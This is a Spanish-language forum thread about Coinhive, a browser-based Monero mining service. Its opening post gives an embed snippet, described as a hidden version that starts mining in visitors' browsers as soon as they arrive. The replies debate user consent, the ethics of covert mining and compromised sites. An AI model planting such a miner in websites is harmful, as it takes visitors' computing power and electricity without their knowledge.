Coin-hive: minar con la potencia de las visitas de vuestra web

WEB: https://coin-hive.com/


image


CÓDIGO A INSERTAR (VERSIÓN OCULTA, DESDE EL INICIO DE LA VISITA):

<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
	var miner = new CoinHive.Anonymous('aquí tu private key de coin-hive');
	miner.start();
</script>

CÓDIGO A INSERTAR (VERSIÓN A VOLUNTAD DEL VISITANTE):

1 me gusta

¿El usuario recibe un aviso acerca del uso que se da a su ordenador al visitar la web?

1 me gusta

Sí y no.

Cuando se ejecuta como reconocimiento de captcha o en redireccionamiento, el usuario sabe que el tiempo de espera lo dedica a minar.

Sin embargo, el minado se puede ocultar, hay formas de ejecutar JavaScript “por debajo de la mesa”.

En ese caso, la pregunta sería: ¿explica la web de Coinhive cómo ocultar el invento a la vista del usuario?

Es que estoy muy escaldado con toda la mierda que cargan bajo manga muchas páginas web y ya no me fio de nadie.

Yo tiro de NoScript para bloquear JS en el navegador.

No, eso está en la mano del que implementa el código.

Han abierto la caja de Pandora, esto dará mucho de que hablar. Imagina a YouTube sustituyendo los segundos de publicidad por segundos de minado…

Totalmente de acuerdo.

Pero me preocupa más la cantidad de webs vulnerables que se van a ver comprometidas para meter ese código.

El uso común de JavaScript no es peligroso. Por poner un ejemplo, AdSense (la publicidad de Google) lo usa para la geolocalización y el remarketing, por nombrar sólo dos.

El abuso si es un problema, ya que ocasiona desgaste en el equipo y pérdida de tiempo al usuario.

Se abren muchos debates, yo por mi parte voy a hacer unas pruebas en una de mis páginas. Temo que sea peor la caída de visitas al empeorar la experiencia de usuario que el dinero que reporta.

Pero me encanta toquetear… :smiling_imp:

1 me gusta

Una estafa más de las que hay para aprovecharse de los recursos de los demás, menuda panda de cara duras hay por ahí sueltos.
La falta de ética entra en este mundo con demasiado entusiasmo, ojalá al que realice esas prácticas se le pueda hacer que se le caiga el pelo.

Gracias por esta opinión tan instructiva. Esta noche, gracias a ti, nos acostaremos sabiendo una cosa más.

Instruirse un poco en ética es lo que más de uno necesita, y probar de su propia medicina.

Esta captura muestra el captcha que ejecuta el minado al SER PULSADO POR EL USUARIO. Incluso hay un link que te explica el proceso.

Al usuario le interesa el contenido/descarga al que se enlaza y cede un poco de CPU a cambio.

No me hables de ética. A mí no, por favor. La tecnología es como un cuchillo, sirve para cortar pan y para matar. Tú decides qué hacer con él.

No crees necesario hablar de ética??
Se ve a más de uno salivar por el colmillo con esta herramienta y no precisamente con la intención de usar el cuchillo para cortar pan.
Toda herramienta que se aproveche de los demás de forma oculta es miserable y los que las propagan, implementan y difunden son más miserables aun.

Pues ale, ya está en marcha:

¿Alguien lo dudaba?

1 me gusta

ojala a cada uno de los que implemente esa herramienta, ocultandolo a los los usuarios, se les revienten los equipos.
Al final es otra herramienta, para que los que están en contra de las criptomonedas, puedan desprestigiarlas.

La pagina web del barça saca moneros (bitcoins) gracias a sus usuarios

Dejando de lado el título del hilo sobre “moneros” y “bitcoins”, vamos ampliando la lista.

Seriesblanco se suma a coinhive. Me acaba de salir el aviso:

Está bien que avisen al usuario, en vez de meter el javascript de tapadillo. Aunque el mensaje no es todo lo claro que podría, ya que no mencionan que lo que van a hacer es minar monero a cuenta de tu factura de la luz.
Si propusiesen un trato mutuamente beneficioso, en lugar de una donación, sería aún más interesante. Por ejemplo: “si nos dejas minar con tu pc mientras ves la película, tendrás HD y ningún anuncio ni pop-up”.